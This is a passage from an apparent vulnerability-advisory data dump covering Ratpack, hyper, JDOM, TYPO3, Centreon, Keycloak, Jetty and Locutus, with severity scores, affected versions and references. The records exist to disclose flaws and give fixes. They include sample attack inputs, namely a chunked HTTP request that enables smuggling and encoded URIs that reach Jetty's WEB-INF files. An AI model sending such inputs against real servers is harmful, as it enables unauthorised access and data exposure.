unsafe objects, leading to the ability to remotely execute arbitrary code. +This is known as an “[insecure deserialization](https://portswigger.net/web-security/deserialization)” vulnerability, or “gadget vulnerability”. + +Ratpack allows session data to be stored server side in an external system such as a relational database, or client side via user cookies. +When using server side storage, the attacker would need to obtain the ability to write to the session data store. +When using client side storage, the attacker would need to obtain the secrets used to encrypt and/or sign the session data stored in user cookies. + +Ratpack's session mechanism allows storing serialized objects, of arbitrary types. +The type must be specified when writing the data and when reading, with data only deserialized when there is an exact type match. +However, in the process of deserializing an object of a known/trusted/deserialization-safe type, it may attempt to deserialize unsafe types. + +By default Ratpack uses Java's built-in serialization mechanism, though other serialization providers can be used. +The exact types of payloads required to enable an exploit depend on the exact serialization mechanism used. + +To mitigate this vulnerability, Ratpack now employs a “strict allow-list” when deserializing (and serializing) objects to session data. +All concrete types of objects serialized must be explicitly declared as safe. +Some standard well known JDK types are registered by default. + +Serialization is provided by implementations of [`SessionSerializer`](https://ratpack.io/manual/1.9.0/api/ratpack/session/SessionSerializer.html). +Its existing methods have been deprecated, and replaced with a [new methods](https://ratpack.io/manual/1.9.0/api/ratpack/session/SessionSerializer.html#deserialize(java.lang.Class,java.io.InputStream,ratpack.session.SessionTypeFilter)) that accept a [`SessionTypeFilter`](https://ratpack.io/manual/1.9.0/api/ratpack/session/SessionTypeFilter.html) that can be used to assert whether a type is allowed when serializing and deserializing. + +The default serializer implementation has been updated to use this mechanism. +Any proprietary implementations should also be updated to consult the type filter _before_ serializing or deserializing data. +Warnings will be logged any time an implementation that does not implement the new methods is used. + +Upon upgrading to Ratpack 1.9, users of the built-in serialization mechanism will need to change their application to declare all types currently being serialized as being safe. This can be done using the new [`SessionModule.allowTypes()`](https://ratpack.io/manual/1.9.0/api/ratpack/session/SessionModule.html#allowTypes(com.google.inject.Binder,java.lang.Class...)) method. Please see its documentation for details...)) + +### Patches + +Ratpack 1.9.0 introduces a strict allow-list mechanism that mitigates this vulnerability when used. + +### Workarounds + +The simplest mitigation for users of earlier versions is to reduce the likelihood of attackers being able to write to the session data store. + +Alternatively or additionally, the allow-list mechanism could be manually back ported by providing an alternative implementation of `SessionSerializer` that uses an allow-list. + +### References + + - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ + - https://owasp.org/www-community/vulnerabilities/Deserialization_of_untrusted_data +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.ratpack:ratpack-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ratpack/ratpack/security/advisories/GHSA-hc33-32vw-rpp9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29485'}, {'type': 'PACKAGE', 'url': 'https://github.com/ratpack/ratpack'}, {'type': 'WEB', 'url': 'https://mvnrepository.com/artifact/io.ratpack/ratpack-core'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-06-30T17:46:45Z', 'nvd_published_at': '2021-06-29T19:15:00Z'}" +1.4.0,GHSA-5h46-h7hh-c6x9,2021-09-07T21:47:36Z,2021-07-12T16:55:37Z,,['CVE-2021-32714'],Integer Overflow in Chunked Transfer-Encoding,"### Summary + +hyper's HTTP server and client code had a flaw that could trigger an integer overflow when decoding chunk sizes that are too big. This allows possible data loss, or if combined with an upstream HTTP proxy that allows chunk sizes larger than hyper does, can result in ""request smuggling"" or ""desync attacks"". + +### Vulnerability + +Example: + +``` +GET / HTTP/1.1 +Host: example.com +Transfer-Encoding: chunked + +f0000000000000003 +abc +0 + +``` + +hyper only reads the rightmost 64-bit integer as the chunk size. So it reads `f0000000000000003` as `3`. A loss of data can occur since hyper would then read only 3 bytes of the body. Additionally, an HTTP request smuggling vulnerability would occur if using a proxy which instead has prefix truncation in the chunk size, or that understands larger than 64-bit chunk sizes. + +Read more about desync attacks: https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn + +### Impact + +To determine if vulnerable to _data loss_, these things must be true: + +- **Using HTTP/1.1.** Since HTTP/2 does not use chunked encoding, it is not vulnerable. +- **Using hyper as a server or client.** The body would be improperly truncated in either case. +- **Users send requests or responses with chunk sizes greater than 18 exabytes**. + +To determine if vulnerable to _desync attacks_, these things must be true: + +- **Using an upstream proxy that allows chunks sizes larger than 64-bit.** If the proxy rejects chunk sizes that are too large, that request won't be forwarded to hyper. + +### Patches + +We have released the following patch versions: + + - v0.14.10 (to be released when this advisory is published) + +### Workarounds + +Besides upgrading hyper, you can take the following options: + +- Reject requests manually that contain a `Transfer-Encoding` header. +- Ensure any upstream proxy rejects `Transfer-Encoding` chunk sizes greater than what fits in 64-bit unsigned integers. + + +### Credits +This issue was initially reported by [Mattias Grenfeldt](https://grenfeldt.dev/) and Asta Olofsson.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'hyper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.14.10'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/hyperium/hyper/security/advisories/GHSA-5h46-h7hh-c6x9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32714'}, {'type': 'PACKAGE', 'url': 'https://github.com/hyperium/hyper'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0079.html'}]","{'cwe_ids': ['CWE-190'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-07T20:05:15Z', 'nvd_published_at': '2021-07-07T20:15:00Z'}" +1.4.0,GHSA-2363-cqg2-863c,2021-08-26T19:57:42Z,2021-07-27T19:02:56Z,,['CVE-2021-33813'],XML External Entity (XXE) Injection in JDOM,"An XXE issue in SAXBuilder in JDOM through 2.0.6 allows attackers to cause a denial of service via a crafted HTTP request. At this time there is not released fixed version of JDOM. As a workaround, to avoid external entities being expanded, one can call `builder.setExpandEntities(false)` and they won't be expanded.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jdom:jdom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33813'}, {'type': 'WEB', 'url': 'https://github.com/hunterhacker/jdom/pull/188'}, {'type': 'WEB', 'url': 'https://github.com/hunterhacker/jdom/commit/dd4f3c2fc7893edd914954c73eb577f925a7d361'}, {'type': 'WEB', 'url': 'https://alephsecurity.com/vulns/aleph-2021003'}, {'type': 'PACKAGE', 'url': 'https://github.com/hunterhacker/jdom'}, {'type': 'WEB', 'url': 'https://github.com/hunterhacker/jdom/releases'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r21c406c7ed88fe340db7dbae75e58355159e6c324037c7d5547bf40b@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5674106135bb1a6ef57483f4c63a9c44bca85d0e2a8a05895a8f1d89@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6db397ae7281ead825338200d1f62d2827585a70797cc9ac0c4bd23f@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r845e987b7cd8efe610284958e997b84583f5a98d3394adc09e3482fe@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r89b3800cfabb1e773e49425e5d4239c28a659839a2eca6af3431482e@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9974f64723875052e02787b2a5eda689ac5247c71b827d455e5dc9a6@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbc075a4ac85e7a8e47420b7383f16ffa0af3b792b8423584735f369f@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfb7a93e40ebeb1e0068cde0bf3834dcab46bb1ef06d6424db48ed9fd@%3Cdev.tika.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/06/msg00026.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/07/msg00012.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AH46QHE5GIMT6BL6C3GDTOYF27JYILXM/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EWFVYTHGILOQXUA7U3SPOERQXL7OPSZG/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]","{'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-27T19:02:41Z', 'nvd_published_at': '2021-06-16T12:15:00Z'}" +1.4.0,GHSA-8mq9-fqv8-59wf,2021-08-31T21:22:31Z,2021-07-22T19:34:43Z,,['CVE-2021-32667'],Cross-Site Scripting in Page Preview,"> ### Meta +> * CVSS: `CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:F/RL:O/RC` (5.0) + +### Problem +Failing to properly encode _Page TSconfig_ settings, corresponding page preview module (_Web>View_) is vulnerable to persistent cross-site scripting. A valid backend user account is needed to exploit this vulnerability. + +### Solution +Update to TYPO3 versions 9.5.28, 10.4.18, 11.3.1 that fix the problem described. + +### Credits +Thanks to TYPO3 core merger Oliver Bartsch who reported and fixed the issue. + +### References +* [TYPO3-CORE-SA-2021-009](https://typo3.org/security/advisory/typo3-core-sa-2021-009)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.5.28'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.4.18'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.3.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-8mq9-fqv8-59wf'}, {'type': 'WEB', 'url': 'https://github.com/TYPO3/typo3/security/advisories/GHSA-8mq9-fqv8-59wf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32667'}, {'type': 'PACKAGE', 'url': 'https://github.com/TYPO3/typo3'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2021-009'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-20T17:02:53Z', 'nvd_published_at': '2021-07-20T15:15:00Z'}" +1.4.0,GHSA-4f26-v6fr-9hmp,2022-04-01T20:24:30Z,2021-07-28T17:52:45Z,,['CVE-2019-16405'],Improper Input Validation in Centreon Web,Centreon Web 19.04.4 allows Remote Code Execution by an administrator who can modify Macro Expression location settings.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'centreon/centreon'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '18.10.8'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'centreon/centreon'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '19.0.0'}, {'fixed': '19.04.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-16405'}, {'type': 'WEB', 'url': 'https://github.com/centreon/centreon/pull/7864'}, {'type': 'WEB', 'url': 'https://github.com/centreon/centreon/pull/7884'}, {'type': 'WEB', 'url': 'https://documentation.centreon.com/docs/centreon/en/latest/release_notes/centreon-18.10.html'}, {'type': 'WEB', 'url': 'https://documentation.centreon.com/docs/centreon/en/latest/release_notes/centreon-19.04.html'}, {'type': 'WEB', 'url': 'https://documentation.centreon.com/docs/centreon/en/latest/release_notes/centreon-19.10.html'}, {'type': 'WEB', 'url': 'https://documentation.centreon.com/docs/centreon/en/latest/release_notes/centreon-2.8.html'}, {'type': 'WEB', 'url': 'https://github.com/TheCyberGeek/CVE-2019-16405.rb'}, {'type': 'PACKAGE', 'url': 'https://github.com/centreon/centreon'}, {'type': 'WEB', 'url': 'https://github.com/centreon/centreon/releases/tag/19.04.5'}, {'type': 'WEB', 'url': 'https://thecybergeek.co.uk/cves/2019/09/17/CVE-2019-16405-06.html'}, {'type': 'WEB', 'url': 'https://thecybergeek.co.uk/cves/2019/09/19/CVEs.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/155999/Centreon-19.04-Remote-Code-Execution.html'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-27T15:34:21Z', 'nvd_published_at': '2019-11-21T18:15:00Z'}" +1.4.0,GHSA-2vp8-jv5v-6qh6,2021-07-14T19:41:44Z,2021-07-13T17:43:23Z,,['CVE-2021-3637'],Allocation of resources without limits or throttling in keycloak-model-infinispan,A flaw was found in keycloak-model-infinispan in keycloak versions before 14.0.0 where authenticationSessions map in RootAuthenticationSessionEntity grows boundlessly which could lead to a DoS attack.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.keycloak:keycloak-model-infinispan'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '14.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3637'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1979638'}]","{'cwe_ids': ['CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-13T16:20:30Z', 'nvd_published_at': '2021-07-09T11:15:00Z'}" +1.4.0,GHSA-vjv5-gp2w-65vm,2022-04-19T15:15:34Z,2021-07-19T15:15:24Z,,['CVE-2021-34429'],Encoded URIs can access WEB-INF directory in Eclipse Jetty,"### Description +URIs can be crafted using some encoded characters to access the content of the `WEB-INF` directory and/or bypass some security constraints. +This is a variation of the vulnerability reported in [CVE-2021-28164](https://nvd.nist.gov/vuln/detail/CVE-2021-28164)/[GHSA-v7ff-8wcx-gmc5](https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5). + +### Impact +The default compliance mode allows requests with URIs that contain a %u002e segment to access protected resources within the WEB-INF directory. For example, a request to `/%u002e/WEB-INF/web.xml` can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. Similarly, an encoded null character can prevent correct normalization so that /.%00/WEB-INF/web.xml cal also retrieve the web.xml file. + +### Workarounds +Some Jetty [rewrite rules](https://www.eclipse.org/jetty/documentation/jetty-9/index.html#rewrite-handler) can be deployed to rewrite any request containing encoded dot segments or null characters in the raw request URI, to a known not found resource: +```xml + + + + .*/(?:\.+/)+.* + /WEB-INF/Not-Found + + + + + + + + +``` + +### Analysis +Prior to 9.4.37, Jetty was protected from this style of attack by two lines of defense: + + URIs were decoded first and then normalized for `.` and `..` sequences. Whilst this is not according to the RFC, it did remove relative segments that were encoded or parameterized and made the resulting URI paths safe from any repeated normalization (often done by URI manipulation and file system mapping). + + The `FileResource` class treated any difference between absolute path and canonical path of a resource as an alias, and thus the resource would not be served by default. + +Prior to 9.4.37, the `FileResource` class was replaced by the `PathResource` class that did not treat normalization differences as aliases. Then release 9.4.37 updated the URI parsing to be compliant with the RFC, in that normalization is done before decoding. This allowed various encodings or adornments to relative path segments that would not be normalized by the pure RFC URI normalization, but were normalized by the file system, thus allowing protected resources to be accessed via an alias. Specifically by decoding URIs after normalization, it left them vulnerable to any subsequent normalization (potentially after checking security constraints) changing the URI singificantly. Such extra normalization is often down by URI manipulation code and file systems. + +With Jetty releases 9.4.43, 10.0.6, 11.0.6, we have restored several lines of defense: + + URIs are first decoded and then normalized which is not strictly according to the current RFC. Since the normalization is done after decoding, the URI paths produced are safe from further normalisation and the referenced resource cannot easily be so changed after passing security constraints. + + During URI parsing checks are made for some specific segments/characters that are possible to be seen ambiguously by an application (e.g. encode dot segments, encoded separators, empty segments, parameterized dot segments and/or null characters). So even though Jetty code handles these URIs correctly, there is a risk that an application may not do so, thus such requests are rejected with a 400 Bad Request unless a specific compliance mode is set. + + Once decoded and normalized by initial URI processing, Jetty will not decode or normalize a received URI again within its own resource handling. This avoids to possibility of double decode attacks. + + The `ContextHandler.getResource(String path)` method always checks that the passed path is normalized, only accepting a non normal path if approved by an AliasChecker. This is the method that is directly used by Jetty resource serving. + + The API methods like `ServletContext.getResource(String path)` will normalize the prior to calling `ContextHandler.getResource(String path)`. This allows applications to use non normal paths. + + The `PathResource` class now considers any difference in normal/canonical name between a request resource name and the found resource name to be an alias, which will only be served if approved by an explicit `AliasChecker` + +In summary, the defense is a front line of detection of specific known URI alias attacks, with the last line defense of not allowing any aliasing of resources. + +Many thanks to @cangqingzhe from @CloverSecLabs for reporting this issue. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-webapp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.4.37'}, {'fixed': '9.4.43'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-webapp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.1'}, {'fixed': '10.0.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-webapp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.1'}, {'fixed': '11.0.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-34429'}, {'type': 'PACKAGE', 'url': 'https://github.com/eclipse/jetty.project'}, {'type': 'WEB', 'url': 'https://github.com/eclipse/jetty.project/releases/tag/jetty-9.4.43.v20210629'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r029c0c6833c8bb6acb094733fd7b75029d633f47a92f1c9d14391fc0@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r02f940c27e997a277ff14e79e84551382e1081e8978b417e0c2b0857@%3Ccommits.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0626f279ebf65506110a897e3a57ccd4072803ee5434b2503e070398@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2a3ea27cca2ac7352d392b023b72e824387bc9ff16ba245ec663bdc6@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2e32390cb7aedb39069e5b18aa130ca53e766258518faee63c31d3ea@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3aefe613abce594c71ace50088d2529bbde65d08b8e7ff2c2723aaa1@%3Cdev.santuario.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3c55b0baa4dc38958ae147b2f216e212605f1071297f845e14477d36@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r44ea39ca8110de7353bfec88f58aa3aa58a42bb324b8772512ee190c@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r46900f74dbb7d168aeac43bf0e7f64825376bb7eb74d31a5b33344ce@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r46f748c1dc9cf9b6c1c18f6b5bfc3a869907f68f72e17666f2f30f24@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4727d282b5c2d951057845a46065d59f6e33132edc0a14f41c26b01e@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r48a93f2bc025acd7c7e341ed3864bfdeb75f0c768d41bc247e1a1f63@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5678d994d4dd8e7c838eed3bbc1a83a7f6bc62724b0cce67e8892a45@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r679d96f981d4c92724090ed2d5e8565a1d655a72bb315550489f052e@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6e6f50c1ce1fb592cb43e913f5be23df104d50751465f8f1952ace0c@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r721ab6a5fa8d45bec76714b674f5d4caed2ebfeca69ad1d6d4caae6c@%3Cdev.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r74fdc446df551fe89a0a16957a1bfdaad19380e0c1afd30625685a9c@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r756443e9d50af7e8c3df82e2c45105f452c8e8195ddbc0c00f58d5fe@%3Ccommits.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r763840320a80e515331cbc1e613fa93f25faf62e991974171a325c82@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7dd079fa0ac6f47ba1ad0af98d7d0276547b8a4e005f034fb1016951@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r833a4c8bdbbfeb8a2cd38238e7b59f83edd5c1a0e508b587fc551a46@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8e6c116628c1277c3cf132012a66c46a0863fa2a3037c0707d4640d4@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r90e7b4c42a96d74c219e448bee6a329ab0cd3205c44b63471d96c3ab@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9d245c6c884bbc804a472116d730c1a01676bf24f93206a34923fc64@%3Ccommits.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9e6158d72ef25077c2dc59fbddade2eacf7d259a2556c97a989f2fe8@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb33d65c3e5686f2e3b9bb8a032a44163b2f2ad9d31a8727338f213c1@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc26807be68748b3347decdcd03ae183622244b0b4cb09223d4b7e500@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcb157f55b9ae41b3076801de927c6fca1669c6d8eaf11a9df5dbeb46@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcea249eb7a0d243f21696e4985de33f3780399bf7b31ea1f6d489b8b@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re01890eef49d4201018f2c97e26536e3e75f441ecdbcf91986c3bc17@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re3de01414ccf682fe0951205f806dd8e94440798fd64c55a4941de3e@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re5e9bb535db779506013ef8799dc2a299e77cdad6668aa94c456dba6@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re850203ef8700cb826534dd4a1cb9f5b07bb8f6f973b39ff7838d3ba@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210819-0006/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]","{'cwe_ids': ['CWE-200', 'CWE-551', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-15T21:33:21Z', 'nvd_published_at': '2021-07-15T17:15:00Z'}" +1.4.0,GHSA-h86x-mv66-gr5q,2021-07-26T19:28:18Z,2021-07-26T21:21:43Z,,['CVE-2020-13619'],OS Command Injection in Locutus,php/exec/escapeshellarg in Locutus PHP through 2.0.11 allows an attacker to achieve code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'locutus'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13619'}, {'type': 'WEB', 'url': 'https://locutus.io/php/'}, {'type': 'WEB', 'url': 'https://web.archive.org/web/20230521185837/https://reallinkers.github.io/CVE-2020-13619/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/locutus'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T19:28:18Z', 'nvd_published_at': '2020-07-01T17:15:00Z'}" +1.4.0,GHSA-34fr-fhqr-7235,2021-08-31T21:23:03Z,2021-07-26T21:16:28Z,,['CVE-2021-32767'],Information Disclosure in User Authentication,"> ### Meta +> * CVSS: `AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N/E:F/RL:O/RC:C` (4.9) + +### Problem +It has been discovered that user credentials have been logged as plaintext when explicitly using log level debug, which is not the _default_ configuration. + +### Solution +Update to TYPO3 versions 7.6.52 ELTS, 8.7.41 ELTS, 9.5.28, 10.4.18, 11.3.1 that fix the problem described. + +### Credits +Thanks to Ingo Schmitt who reported this issue, and to TYPO3 core & security team member Benni Mack who fixed the issue. + +### References +* [TYPO3-CORE-SA-2021-012](https://typo3.org/security/advisory/typo3-core-sa-2021-012)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.6.52'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.7.41'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.5.28'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.4.18'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.3.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-34fr-fhqr-7235'}, {'type': 'WEB', 'url': 'https://github.com/TYPO3/typo3/security/advisories/GHSA-34fr-fhqr-7235'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32767'}, {'type': 'WEB', 'url': 'https://github.com/TYPO3/typo3/commit/0b4950163b8919451964133febc65bcdfcec721c'}, {'type': 'PACKAGE', 'url': 'https://github.com/TYPO3/typo3'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2021-012'}, {'type': 'WEB', 'url': 